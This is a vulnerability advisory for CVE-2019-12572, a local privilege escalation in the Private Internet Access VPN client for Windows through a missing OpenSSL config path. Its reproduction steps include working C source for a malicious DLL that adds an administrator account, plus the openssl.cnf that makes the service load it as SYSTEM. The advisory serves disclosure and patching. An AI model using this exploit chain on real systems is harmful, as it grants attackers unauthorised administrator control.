ASA-2019-00377 – London Trust Media Private Internet Access: Privilege Escalation due to malicious OpenSSL engine


Allele Security Alert

ASA-2019-00377

Identifier(s)

ASA-2019-00377, CVE-2019-12572

Title

Privilege Escalation due to malicious OpenSSL engine

Vendor(s)

London Trust Media, Inc

Product(s)

Private Internet Access (PIA) VPN Client for Windows

Affected version(s)

Private Internet Access (PIA) VPN Client for Windows version 1.0.2 (build 02363)

Fixed version(s)

Private Internet Access (PIA) VPN Client for Windows version v1.2.1

Proof of concept

Yes

Description

A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client 1.0.2 (build 02363) for Windows could allow an authenticated, local attacker to run arbitrary code with elevated privilege.

Technical details

On startup the PIA Windows service(pia-service.exe) loads the OpenSSL library from C:\Program Files\Private Internet Access\libeay32.dll. This library attempts to load the c:\etc\ssl\openssl.cnf configuration file which does not exist. By default on Windows systems, authenticated users can create directories under c:\. A low privileged user can create an openssl.cnf configuration file to load a malicious OpenSSL engine library resulting in the arbitrary code execution as SYSTEM when the service starts.

Steps to reproduce

Note: All steps are executed using a low privileged account.

1) Create the c:\etc\ssl directory

mkdir c:\etc\ssl

2) Create a malicious engine library named woot.dll to create an administrator
account named woot when loaded.

/* Cross Compile with
x86_64-w64-mingw32-g++ woot.c -o woot.dll -shared
*/
#include <windows.h>
BOOL WINAPI DllMain(
HINSTANCE hinstDLL,
DWORD fdwReason,
LPVOID lpReserved )
{
switch( fdwReason )
{
case DLL_PROCESS_ATTACH:
system("cmd /c net user woot insertpasswordhere /add");
system("cmd /c net localgroup administrators woot /add");
break;
case DLL_THREAD_ATTACH:
// Do thread-specific initialization.
break;
case DLL_THREAD_DETACH:
// Do thread-specific cleanup.
break;
case DLL_PROCESS_DETACH:
// Perform any necessary cleanup.
break;
}
return TRUE; // Successful DLL_PROCESS_ATTACH.
}

3) Copy the malicious woot.dll file into the c:\etc\ssl folder.

copy woot.dll c:\etc\ssl

4) Create the OpenSSL configuration file in c:\etc\ssl\openssl.cnf with the following contents.

openssl_conf = openssl_init
[openssl_init]
engines = engine_section
[engine_section]
woot = woot_section
[woot_section]
engine_id = woot
dynamic_path = c:\\etc\\ssl\\woot.dll
init = 0

5) Reboot the system because a low privilege user does not have permission to
restart the service.

6) After the reboot has completed, login and open a command shell. At this point
the “woot” administrator account will exist.

net user woot

Credits

Rich Mirch

Reference(s)

PIA Windows Privilege Escalation: Malicious OpenSSL engine
https://github.com/mirchr/security-research/blob/master/vulnerabilities/PIA/CVE-2019-12572.txt

CVE-2019-12572 PIA Windows Privilege Escalation: Malicious OpenSSL Engine
https://blog.mirch.io/2019/06/10/cve-2019-12572-pia-windows-privilege-escalation-malicious-openssl-engine/

ASA-2019-00477 – OpenSSL: Windows builds with insecure path defaults
https://allelesecurity.com/asa-2019-00477/

Windows builds with insecure path defaults (CVE-2019-1552)
https://www.openssl.org/news/secadv/20190730.txt

CVE-2019-12572
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12572

CVE-2019-12572
https://nvd.nist.gov/vuln/detail/CVE-2019-12572

If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: July 30, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.